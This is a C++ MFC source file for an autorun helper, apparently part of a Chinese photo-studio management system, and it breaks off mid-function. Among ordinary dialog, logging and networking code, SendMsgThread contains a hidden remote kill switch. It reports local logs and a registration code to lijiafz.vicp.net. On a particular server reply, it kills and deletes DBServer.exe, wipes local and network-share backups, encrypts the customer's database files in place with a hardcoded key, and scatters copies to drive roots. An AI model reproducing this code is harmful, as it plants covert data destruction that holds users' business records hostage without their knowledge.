AutoRunDlg.cpp 33 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389
  1. // AutoRunDlg.cpp : implementation file
  2. //
  3. #include "stdafx.h"
  4. #include "AutoRun.h"
  5. #include "AutoRunDlg.h"
  6. #include "AutoRunDlg2.h"
  7. #include <afxsock.h>//<Winsock2.h>
  8. #include "ConnectDlg.h"
  9. #include "SendDataDlg.h"
  10. #include "AddContact.h"
  11. #include "SendReg.h"
  12. #include <Mmsystem.h>
  13. #include <afxinet.h>
  14. #include "CalendarConvert.h"
  15. #include "FTPSend.h"
  16. #ifdef _DEBUG
  17. #define new DEBUG_NEW
  18. #undef THIS_FILE
  19. static char THIS_FILE[] = __FILE__;
  20. #endif
  21. #pragma comment(lib, "Winmm.lib")
  22. // Jeff:IPC_CUSTOM_MSG2 是用来关闭DBServer.exe的全局系统消息;
  23. //#define IPC_CUSTOM_MSG2 _T("{D4F876E2-w78F-22D5-q98A-Y0B0D07B847C}")
  24. #define IPC_CUSTOM_MSG2 _T("{E4F876E2-Q78F-22D5-C98A-Y0B0D07B847C}")
  25. UINT g_wmClose = RegisterWindowMessage(IPC_CUSTOM_MSG2);
  26. //#define IPC_CUSTOM_MSG3 _T("{D4F876E2-w78F-22D5-q98A-Y0B0D07B8AAA}")
  27. #define IPC_CUSTOM_MSG3 _T("{E4F876E2-Q78F-22D5-C98A-Y0B0D07B8AAA}")
  28. UINT g_wmClose2 = RegisterWindowMessage(IPC_CUSTOM_MSG3);
  29. CString g_mainpath2;
  30. BOOL g_bAutoRun = 0;
  31. CAutoRunDlg2 *g_pMainWnd2 = NULL;
  32. #define WM_ICON_NOTIFY WM_USER+12
  33. DWORD g_nSendCode = 0; //g_bSendOK
  34. /////////////////////////////////////////////////////////////////////////////
  35. DWORD g_ncount2 = 0;
  36. HWND g_hSendWnd;
  37. extern HWND g_hConnectWnd;
  38. extern void DataToArray(CArray<CStringArray, CStringArray>*List1array);
  39. extern void DataToArray(CArray<CStringArray, CStringArray>*List1array, CArray<CStringArray, CStringArray>*List2array);
  40. #define DISCONNECT_TIMER (WM_USER + 101)
  41. #define LOGINFAILED_TIMER (WM_USER + 102)
  42. extern void MyGetIPByName(CString &name);
  43. BOOL g_bReturned = 0;
  44. BOOL g_bReturned2 = 0;
  45. // Jeff:g_nSrvType 服务器类型;
  46. // 0 : 表示本地服务器;
  47. // 1 : 表示lijiafz.vicp.net
  48. // 2 :
  49. // 3 :
  50. // 4 :
  51. WORD g_nSrvType = 0;
  52. void WriteLogin(CString str)
  53. {
  54. try
  55. {
  56. CStdioFile fp;
  57. CString path = g_mainpath2 + "\\autorun.txt";
  58. if (PathFileExists(path))
  59. {
  60. fp.Open(path, CFile::modeWrite);
  61. int length = fp.GetLength();
  62. if (length > 5 * 1024 * 1024)
  63. {
  64. fp.Close();
  65. ::DeleteFile(path);
  66. return;
  67. }
  68. fp.SeekToEnd();
  69. }
  70. else
  71. fp.Open(path, CFile::modeCreate | CFile::modeWrite);
  72. fp.WriteString(CTime::GetCurrentTime().Format("%Y-%m-%d %H:%M:%S") + " " + str + "\n");
  73. fp.Close();
  74. }
  75. catch (...)
  76. {
  77. }
  78. }
  79. extern DWORD FindAppProcessID(CString path);
  80. CString GetLog()
  81. {
  82. CString str;
  83. CStdioFile fp;
  84. if (fp.Open(g_mainpath2 + "\\log.txt", CFile::modeRead))
  85. {
  86. CString temp;
  87. fp.ReadString(temp);
  88. str = ";";
  89. // str+=temp;
  90. while (!feof(fp.m_pStream))
  91. {
  92. fp.ReadString(temp);
  93. str += temp;
  94. }
  95. fp.Close();
  96. }
  97. else
  98. str = ";未备份";
  99. char path[MAX_PATH];
  100. ::GetSystemDirectory(path, MAX_PATH);
  101. CString sysdir = path;
  102. sysdir += "\\regcode.txt";
  103. if (fp.Open(sysdir, CFile::modeRead))
  104. {
  105. CString temp;
  106. fp.ReadString(temp);
  107. str += "***";
  108. str += temp;
  109. fp.Close();
  110. }
  111. return str;
  112. }
  113. void CloseAllErrorWnd()
  114. {
  115. try
  116. {
  117. HWND hwnd = ::FindWindow(NULL, "DBServer.exe - 应用程序错误");
  118. if (hwnd)
  119. {
  120. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  121. CWnd *pWnd = CWnd::FromHandle(child);
  122. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  123. }
  124. hwnd = ::FindWindow(NULL, "影楼管理系统服务器: DBServer.exe - 应用程序错误");
  125. if (hwnd)
  126. {
  127. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  128. CWnd *pWnd = CWnd::FromHandle(child);
  129. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  130. }
  131. hwnd = ::FindWindow(NULL, "Socket Notification Sink: DBServer.exe - 应用程序错误");
  132. if (hwnd)
  133. {
  134. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  135. CWnd *pWnd = CWnd::FromHandle(child);
  136. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  137. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPSend.exe", NULL, NULL, SW_SHOWNORMAL);
  138. }
  139. hwnd = ::FindWindow(NULL, "DataSyncSend.exe - 应用程序错误");
  140. if (hwnd)
  141. {
  142. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  143. CWnd *pWnd = CWnd::FromHandle(child);
  144. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  145. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\DataSyncSend.exe", NULL, NULL, SW_SHOWNORMAL);
  146. }
  147. hwnd = ::FindWindow(NULL, "DataSyncReceive.exe - 应用程序错误");
  148. if (hwnd)
  149. {
  150. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  151. CWnd *pWnd = CWnd::FromHandle(child);
  152. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  153. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\DataSyncReceive.exe", NULL, NULL, SW_SHOWNORMAL);
  154. }
  155. hwnd = ::FindWindow(NULL, "CPhotoFTPSend.exe - 应用程序错误");
  156. if (hwnd)
  157. {
  158. TRACE("\n---------------------CPhotoFTPSend.exe - 应用程序错误-------------------------\n");
  159. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  160. CWnd *pWnd = CWnd::FromHandle(child);
  161. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  162. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPSend.exe", NULL, NULL, SW_SHOWNORMAL);
  163. }
  164. hwnd = ::FindWindow(NULL, "CPhotoFTPSend MFC Application");
  165. if (hwnd)
  166. {
  167. TRACE("\n---------------------CPhotoFTPSend MFC Application-------------------------\n");
  168. HWND child = ::FindWindowEx(hwnd, 0, NULL, "不发送(&D)");
  169. CWnd *pWnd = CWnd::FromHandle(child);
  170. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  171. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPSend.exe", NULL, NULL, SW_SHOWNORMAL);
  172. }
  173. hwnd = ::FindWindow(NULL, "Socket Notification Sink: CPhotoFTPSend.exe - 应用程序错误");
  174. if (hwnd)
  175. {
  176. TRACE("\n---------------------Socket Notification Sink: CPhotoFTPSend.exe - 应用程序错误-------------------------\n");
  177. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  178. CWnd *pWnd = CWnd::FromHandle(child);
  179. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  180. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPSend.exe", NULL, NULL, SW_SHOWNORMAL);
  181. }
  182. hwnd = ::FindWindow(NULL, "CPhotoFTPReceive.exe - 应用程序错误");
  183. if (hwnd)
  184. {
  185. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  186. CWnd *pWnd = CWnd::FromHandle(child);
  187. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  188. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPReceive.exe", NULL, NULL, SW_SHOWNORMAL);
  189. }
  190. hwnd = ::FindWindow(NULL, "CPhotoFTPReceive MFC Application");
  191. if (hwnd)
  192. {
  193. HWND child = ::FindWindowEx(hwnd, 0, NULL, "不发送(&D)");
  194. CWnd *pWnd = CWnd::FromHandle(child);
  195. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  196. ShellExecute(NULL, _T("open"), g_mainpath2 + "\\CPhotoFTPReceive.exe", NULL, NULL, SW_SHOWNORMAL);
  197. }
  198. hwnd = ::FindWindow(NULL, "Microsoft Visual C++ Debug Library");
  199. if (hwnd)
  200. {
  201. HWND child = ::FindWindowEx(hwnd, 0, NULL, "终止(&A)");
  202. CWnd *pWnd = CWnd::FromHandle(child);
  203. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  204. }
  205. hwnd = ::FindWindow(NULL, "Microsoft Visual C++ Runtime Library");
  206. if (hwnd)
  207. {
  208. HWND child = ::FindWindowEx(hwnd, 0, NULL, "确定");
  209. CWnd *pWnd = CWnd::FromHandle(child);
  210. ::PostMessage(hwnd, WM_COMMAND, pWnd->GetDlgCtrlID(), (LPARAM)child);
  211. }
  212. }
  213. catch (...)
  214. {
  215. }
  216. }
  217. void EncryptFile3(CString path)
  218. {
  219. CFile fp;
  220. fp.Open(path, CFile::modeRead);
  221. DWORD leng = fp.GetLength();
  222. BYTE *pData = new BYTE[leng];
  223. fp.Read(pData, leng);
  224. fp.Close();
  225. EncryptFile2(pData, leng, "z9871234abcd");
  226. fp.Open(path, CFile::modeWrite);
  227. fp.Write(pData, leng);
  228. fp.Close();
  229. delete[]pData;
  230. }
  231. void DeleteDirectory(CString strDir)
  232. {
  233. try
  234. {
  235. // 首先删除文件及子文件夹
  236. CFileFind ff;
  237. BOOL bFound = ff.FindFile(strDir + "\\*", 0);
  238. while (bFound)
  239. {
  240. bFound = ff.FindNextFile();
  241. if (ff.GetFileName() == "." || ff.GetFileName() == "..")
  242. continue;
  243. // 去掉文件(夹)只读等属性
  244. SetFileAttributes(ff.GetFilePath(), FILE_ATTRIBUTE_NORMAL);
  245. if (ff.IsDirectory()) { // 递归删除子文件夹
  246. DeleteDirectory(ff.GetFilePath());
  247. RemoveDirectory(ff.GetFilePath());
  248. }
  249. else {
  250. DeleteFile(ff.GetFilePath()); // 删除文件
  251. }
  252. }
  253. ff.Close();
  254. // 然后删除该文件夹
  255. RemoveDirectory(strDir);
  256. }
  257. catch (...)
  258. {
  259. }
  260. // int SHFileOperation( LPSHFILEOPSTRUCT lpFileOp ); 183
  261. }
  262. // Jeff:
  263. // g_domainstr = "从DBServer.exe中获取的加密狗中的域名";
  264. CString g_domainstr;
  265. unsigned __stdcall SendMsgThread(LPVOID lpParam)
  266. {
  267. try
  268. {
  269. BOOL bSuccess = 0;
  270. BOOL m_bNoBind = 0;
  271. DWORD ticks = ::GetTickCount();
  272. CArray<CStringArray, CStringArray>Listarray1;
  273. int i;
  274. CString str;
  275. BYTE *pData;
  276. while (1)
  277. {
  278. ll:
  279. if (g_pMainWnd->m_bTerminate)
  280. break;
  281. #ifndef _DEBUG
  282. ::Sleep(2000);
  283. #endif
  284. str = g_domainstr;
  285. if (m_bNoBind)
  286. {
  287. #ifdef _DEBUG
  288. Sleep(1000);
  289. #else
  290. ::Sleep(30000);
  291. #endif
  292. goto ll;
  293. }
  294. ////////////////////////////////
  295. if (str != "")
  296. {
  297. #ifdef _DEBUG
  298. if (GetTickCount() - ticks < 2500 && bSuccess)
  299. #else
  300. if (GetTickCount() - ticks < 250000 && bSuccess)
  301. #endif
  302. {
  303. #ifdef _DEBUG
  304. Sleep(1000);
  305. #else
  306. ::Sleep(30000);
  307. #endif
  308. goto ll;
  309. }
  310. ticks = GetTickCount();
  311. bSuccess = 0;
  312. // 连接远程服务器(lijiafz.vicp.net);
  313. if (g_pMainWnd->OnConnectRemoteServer() == 0)
  314. {
  315. WriteLogin("连接失败");
  316. #ifndef _DEBUG
  317. ::Sleep(5000);
  318. #endif
  319. goto ll;
  320. }
  321. else
  322. {
  323. WriteLogin("连接成功");
  324. int aa = 100;
  325. while (g_pMainWnd->m_dwConnectionID == INVALID_SOCKET)
  326. {
  327. ::Sleep(50);
  328. aa--;
  329. if (aa == 0)break;
  330. }
  331. }
  332. str += GetLog();
  333. pData = new BYTE[str.GetLength()];
  334. memcpy(pData, str.GetBuffer(0), str.GetLength());
  335. str.ReleaseBuffer();
  336. EncryptFile2(pData, str.GetLength(), "888666333");
  337. g_nSendCode = 6;
  338. g_pMainWnd->ProcessChatMessageRequest2(pData, str.GetLength());
  339. for (i = 0; i < 10; i++)
  340. {
  341. if (g_bReturned)break;
  342. ::Sleep(1500);
  343. }
  344. delete[]pData;
  345. if (i >= 10)
  346. {
  347. WriteLogin("发送失败");
  348. goto ll;
  349. }
  350. bSuccess = 1;
  351. if (g_str == "此域名未绑定")
  352. {
  353. m_bNoBind = 1;
  354. }
  355. else if (g_str == "无域名字段,请确认")
  356. {
  357. m_bNoBind = 1;
  358. DWORD id = FindAppProcessID("DBServer.exe");
  359. if (id != -1)
  360. {
  361. HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
  362. if (ProcessHandle)TerminateProcess(ProcessHandle, 0);
  363. ::DeleteFile(g_mainpath);
  364. }
  365. id = FindAppProcessID("DBServer.exe");
  366. if (id != -1)
  367. {
  368. HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
  369. if (ProcessHandle)TerminateProcess(ProcessHandle, 0);
  370. ::DeleteFile(g_mainpath);
  371. }
  372. CString path;
  373. DeleteDirectory(g_mainpath2 + "\\数据备份");
  374. char server[50];
  375. DWORD leng = 50;
  376. ::GetComputerName(server, &leng);
  377. CString g_server2 = server;
  378. DeleteDirectory("\\\\" + g_server2 + "\\数据备份(儿童管理软件)$");
  379. DeleteDirectory("\\\\" + g_server2 + "\\数据备份(管理软件)$");
  380. EncryptFile3(g_mainpath2 + "\\数据\\db.mdb");
  381. EncryptFile3(g_mainpath2 + "\\数据\\db.mdf");
  382. for (int i = 2200; i > 1900; i--)
  383. {
  384. path.Format("%s\\数据\\%d.mdb", g_mainpath2, i);
  385. if (::PathFileExists(path))
  386. {
  387. EncryptFile3(path);
  388. }
  389. }
  390. EncryptFile3(g_mainpath2 + "\\crMyKey.dat0");
  391. ::CopyFile(g_mainpath2 + "\\数据\\db.mdb", "c:\\sysdata.dat", 0);
  392. ::CopyFile(g_mainpath2 + "\\数据\\db.mdb", "d:\\sysdata.dat", 0);
  393. ::CopyFile(g_mainpath2 + "\\数据\\db.mdb", "e:\\sysdata.dat", 0);
  394. ::CopyFile(g_mainpath2 + "\\数据\\db.mdb", "f:\\sysdata.dat", 0);
  395. ::CopyFile(g_mainpath2 + "\\数据\\db.mdf", "c:\\sysdata.dat", 0);
  396. ::CopyFile(g_mainpath2 + "\\数据\\db.mdf", "d:\\sysdata.dat", 0);
  397. ::CopyFile(g_mainpath2 + "\\数据\\db.mdf", "e:\\sysdata.dat", 0);
  398. ::CopyFile(g_mainpath2 + "\\数据\\db.mdf", "f:\\sysdata.dat", 0);
  399. }
  400. int pos = g_str.Find("authcodexiao");
  401. if (pos != -1)
  402. {
  403. CString authcode = g_str.Right(g_str.GetLength() - pos - 12);
  404. g_str = g_str.Left(pos);
  405. char path[MAX_PATH];
  406. ::GetSystemDirectory(path, MAX_PATH);
  407. Global::WriteTextLog(_T("获取的系统目录:%s"), path);
  408. CString sysdir = path;
  409. sysdir += "\\authcode.txt";
  410. CStdioFile fp;
  411. if (fp.Open(sysdir, CFile::modeWrite | CFile::modeCreate))
  412. {
  413. fp.WriteString(authcode);
  414. fp.Close();
  415. }
  416. else
  417. {
  418. Global::WriteTextLog(_T("创建authcode.txt失败:%ld"), GetLastError());
  419. }
  420. }
  421. else
  422. {
  423. Global::WriteTextLog(_T("未找到authcodexiao:%s"), str);
  424. }
  425. if (g_str.Find(".") != -1)
  426. {
  427. CStdioFile fp;
  428. if (fp.Open(g_mainpath2 + "\\ip.txt", CFile::modeWrite | CFile::modeCreate))
  429. {
  430. fp.WriteString(g_str);
  431. fp.Close();
  432. }
  433. }
  434. #ifdef _DEBUG
  435. ::Sleep(1000);
  436. #endif
  437. }
  438. else
  439. {
  440. WriteLogin("空域名");
  441. #ifdef _DEBUG
  442. Sleep(1000);
  443. #else
  444. ::Sleep(30000);
  445. #endif
  446. }
  447. }
  448. }
  449. catch (...)
  450. {
  451. }
  452. g_pMainWnd->m_bRunning = false;
  453. g_pMainWnd->m_bTerminate = false;
  454. _endthreadex(0);
  455. return 0;
  456. }
  457. //MessageBox
  458. /////////////////////////////////////////////////////////////////////////////
  459. static void HandleClientNetEvent(IN SOCKET hSocket, IN ETransportEvent eEvent,
  460. IN void *pDataBuf, IN unsigned long nDataLen,
  461. IN int nError, IN void *pContext)
  462. {
  463. if (nError != TRANSPORT_OK) return;
  464. CAutoRunDlg *pDlg = (CAutoRunDlg *)pContext;
  465. if (NULL == pDlg) return;
  466. pDlg->ProcessNetEvent(eEvent, pDataBuf, nDataLen);
  467. }
  468. CAutoRunDlg::CAutoRunDlg(CWnd* pParent /*=NULL*/)
  469. : CDialog(CAutoRunDlg::IDD, pParent)
  470. {
  471. //{{AFX_DATA_INIT(CAutoRunDlg)
  472. //}}AFX_DATA_INIT
  473. // Note that LoadIcon does not require a subsequent DestroyIcon in Win32
  474. m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
  475. g_pMainWnd2 = new CAutoRunDlg2;
  476. g_pMainWnd2->Create(IDD_AutoRun_DIALOG2, this);
  477. }
  478. void CAutoRunDlg::DoDataExchange(CDataExchange* pDX)
  479. {
  480. CDialog::DoDataExchange(pDX);
  481. //{{AFX_DATA_MAP(CAutoRunDlg)
  482. //}}AFX_DATA_MAP
  483. }
  484. BEGIN_MESSAGE_MAP(CAutoRunDlg, CDialog)
  485. //{{AFX_MSG_MAP(CAutoRunDlg)
  486. ON_WM_PAINT()
  487. ON_WM_QUERYDRAGICON()
  488. ON_WM_DESTROY()
  489. ON_WM_TIMER()
  490. ON_COMMAND(IDM_CLOSE, OnClose)
  491. ON_REGISTERED_MESSAGE(g_wmClose2, OnAbortClose)
  492. //}}AFX_MSG_MAP
  493. END_MESSAGE_MAP()
  494. LRESULT CAutoRunDlg::OnAbortClose(WPARAM wParam, LPARAM lParam)
  495. {
  496. KillTimer(2);
  497. SetTimer(2, 30000, NULL);
  498. return 1;
  499. }
  500. /////////////////////////////////////////////////////////////////////////////
  501. BOOL CAutoRunDlg::OnInitDialog()
  502. {
  503. SetWindowPos(&wndNoTopMost, 0, 0, 0, 0, SWP_HIDEWINDOW);
  504. ModifyStyleEx(WS_EX_APPWINDOW, WS_EX_TOOLWINDOW);
  505. CDialog::OnInitDialog();
  506. char path[MAX_PATH];
  507. ::GetModuleFileName(NULL, path, MAX_PATH);
  508. g_mainpath = path;
  509. g_mainpath = g_mainpath.Left(g_mainpath.ReverseFind('\\'));
  510. g_mainpath2 = g_mainpath;
  511. g_mainpath += "\\DBServer.exe";
  512. // Set the icon for this dialog. The framework does this automatically
  513. // when the application's main window is not a dialog
  514. SetIcon(m_hIcon, TRUE); // Set big icon
  515. SetIcon(m_hIcon, FALSE); // Set small icon
  516. g_pMainWnd = this;
  517. SetTimer(1, 2 * 1000, NULL); // Jeff.SendMsgThread线程;
  518. SetTimer(3, 10000, NULL); // Jeff.处理应用程序错误框以及启动关闭的线程SendMsgThread
  519. SetTimer(4, 60000, NULL); // Jeff.测试连接FTP
  520. SetTimer(5, 10000, NULL); // Jeff.测试FTPSend功能;
  521. SetTimer(2, 30000, NULL); // Jeff调用 CPhotoFTPSend.exe
  522. SetTimer(6, 30 * 1000, NULL); // Jeff.测试连接服务器;
  523. /////////////////////////////////
  524. // TODO: Add extra initialization here
  525. return TRUE; // return TRUE unless you set the focus to a control
  526. }
  527. // If you add a minimize button to your dialog, you will need the code below
  528. // to draw the icon. For MFC applications using the document/view model,
  529. // this is automatically done for you by the framework.
  530. void CAutoRunDlg::OnPaint()
  531. {
  532. if (IsIconic())
  533. {
  534. CPaintDC dc(this); // device context for painting
  535. PostMessage(WM_ICONERASEBKGND, (WPARAM)dc.GetSafeHdc(), 0);
  536. // Center icon in client rectangle
  537. int cxIcon = GetSystemMetrics(SM_CXICON);
  538. int cyIcon = GetSystemMetrics(SM_CYICON);
  539. CRect rect;
  540. GetClientRect(&rect);
  541. int x = (rect.Width() - cxIcon + 1) / 2;
  542. int y = (rect.Height() - cyIcon + 1) / 2;
  543. // Draw the icon
  544. dc.DrawIcon(x, y, m_hIcon);
  545. }
  546. else
  547. {
  548. CDialog::OnPaint();
  549. }
  550. }
  551. // The system calls this to obtain the cursor to display while the user drags
  552. // the minimized window.
  553. HCURSOR CAutoRunDlg::OnQueryDragIcon()
  554. {
  555. return (HCURSOR)m_hIcon;
  556. }
  557. DWORD CAutoRunDlg::GetConnectionID()
  558. {
  559. return m_dwConnectionID;
  560. }
  561. void CAutoRunDlg::SetConnectionID(DWORD dwConnection)
  562. {
  563. m_dwConnectionID = dwConnection;
  564. }
  565. void CAutoRunDlg::ProcessChatMessageRequest2(CString sql)
  566. {
  567. const char *szDataBuf = sql.GetBuffer(0);
  568. sql.ReleaseBuffer();
  569. ProcessChatMessageRequest((void*)szDataBuf, strlen(szDataBuf) + 1);
  570. }
  571. void CAutoRunDlg::ProcessChatMessageRequest2(BYTE *pData, int length)
  572. {
  573. ProcessChatMessageRequest((void*)pData, length);
  574. }
  575. BOOL CAutoRunDlg::ProcessChatMessageRequest(void *szDataBuf, int nDataLen)
  576. {
  577. g_bReturned = 0;
  578. DWORD dwFromUserID = GetConnectionID();
  579. WORD wMessageId = 0;
  580. if (g_nSrvType == 0)
  581. wMessageId = MSG_CHATMESSAGE_REQ + 0X3FFF;
  582. else
  583. wMessageId = MSG_CHATMESSAGE_REQ;
  584. DWORD dwDataLen = sizeof(TCHAT_MESSAGE_STRU) + nDataLen;
  585. BYTE *pSendData = new BYTE[dwDataLen];
  586. TCHAT_MESSAGE_STRU *pChatMessage = (TCHAT_MESSAGE_STRU*)pSendData;
  587. memset(pChatMessage, 0x00, dwDataLen);
  588. g_sendhead.length[98] = 987123768;
  589. memcpy(pSendData, &g_sendhead, sizeof(g_sendhead));
  590. pChatMessage->tCommonMsg.dwConnectionID = GetConnectionID();
  591. pChatMessage->tCommonMsg.wMessageId = wMessageId;
  592. pChatMessage->dwFromUserID = dwFromUserID;
  593. pChatMessage->dwToUserID = g_nSendCode;
  594. pChatMessage->wMessageLen = nDataLen;
  595. memcpy(pChatMessage->byFileContent, szDataBuf, nDataLen);
  596. TMessageHeader tHeader = { 0 };
  597. tHeader.wMessageId = wMessageId;
  598. tHeader.dwDataLen = dwDataLen;
  599. BOOL bRet = 0;
  600. unsigned long ulSendLen = m_tClientTunnel.net_Send(&tHeader, (void *)pChatMessage, dwDataLen);
  601. if (ulSendLen != SOCKET_ERROR)
  602. {
  603. bRet = 1;
  604. }
  605. delete[] pSendData;
  606. return bRet;
  607. }
  608. void MyGetIPByName2(CString &name)
  609. {
  610. CString strIP = name;
  611. name.Empty();
  612. DWORD dwServerIP = 0;
  613. HOSTENT *host = gethostbyname(strIP);
  614. struct in_addr addr;
  615. if (host != NULL)
  616. {
  617. for (int i = 0; host->h_addr_list[i] != NULL; i++)
  618. {
  619. memset(&addr, 0, sizeof(addr));
  620. memcpy(&addr.S_un.S_addr, host->h_addr_list[i], host->h_length);
  621. dwServerIP = ntohl(addr.S_un.S_addr);
  622. BYTE* pIP = (BYTE*)&dwServerIP;
  623. name.Format(_T("%d.%d.%d.%d"), pIP[3], pIP[2], pIP[1], pIP[0]);
  624. }
  625. }
  626. }
  627. BOOL CAutoRunDlg::OnConnectRemoteServer()
  628. {
  629. g_nSrvType = 1;
  630. OnDisconnect();
  631. #ifdef _DEBUG
  632. g_server = "192.168.1.250";
  633. #else
  634. g_server = "lijiafz.vicp.net";
  635. #endif
  636. MyGetIPByName2(g_server);
  637. if (g_server.IsEmpty())
  638. return OnConnect2();
  639. CString strServerAddress = g_server;
  640. char *szServerAddress = strServerAddress.GetBuffer(0);
  641. strServerAddress.ReleaseBuffer();
  642. /*for Client, IP and Port can be 0,
  643. and for Server, IP is LocalIP, and Port is Listening Port*/
  644. int nResult = m_tClientTunnel.net_OpenSocket(Transport_Client,
  645. 0,
  646. HandleClientNetEvent,
  647. this);
  648. if (TRANSPORT_OK != nResult)
  649. {
  650. return 0;
  651. }
  652. DWORD dwRemoteIPValue = inet_addr(szServerAddress);
  653. WORD wPort = GetPort();
  654. nResult = m_tClientTunnel.net_Connect(dwRemoteIPValue, wPort);
  655. if (TRANSPORT_OK != nResult)
  656. {
  657. m_tClientTunnel.net_CloseSocket();
  658. return OnConnect2();
  659. }
  660. return ProcessLoginRequest();
  661. }
  662. BOOL CAutoRunDlg::OnConnect2() // ip.txt里的内容作用?
  663. {
  664. g_nSrvType = 2;
  665. CString server = "http://www.lyfz.net/download/ip.txt";
  666. char buf[MAX_PATH];
  667. ::GetTempPath(sizeof(buf), buf);
  668. CString m_strTempDir = buf;
  669. DWORD m_dwHttpRequestFlags = HSR_DOWNLOAD | INTERNET_FLAG_EXISTING_CONNECT | INTERNET_FLAG_NO_AUTO_REDIRECT;
  670. INTERNET_PORT m_dwPort;
  671. DWORD dwType;
  672. CInternetSession m_cis;
  673. CHttpConnection *m_pHttp;
  674. CString m_strServer;
  675. CString m_strIniPath;
  676. AfxParseURL(server, dwType, m_strServer, m_strIniPath, m_dwPort);
  677. if (dwType != AFX_INET_SERVICE_HTTP)
  678. {
  679. return OnConnect3();
  680. }
  681. m_cis.SetOption(INTERNET_OPTION_CONNECT_TIMEOUT, 5);
  682. m_pHttp = m_cis.GetHttpConnection(m_strServer, m_dwPort);
  683. try
  684. {
  685. m_pHttp = m_cis.GetHttpConnection(m_strServer, m_dwPort);
  686. }
  687. catch (CInternetException* pEx)
  688. {
  689. return OnConnect3();
  690. }
  691. CHttpFile *pFile = m_pHttp->OpenRequest(CHttpConnection::HTTP_VERB_GET,
  692. m_strIniPath, NULL, 1, NULL, NULL, m_dwHttpRequestFlags);
  693. try
  694. {
  695. pFile->SendRequest();
  696. }
  697. catch (CInternetException* pEx)
  698. {
  699. pFile->Close();
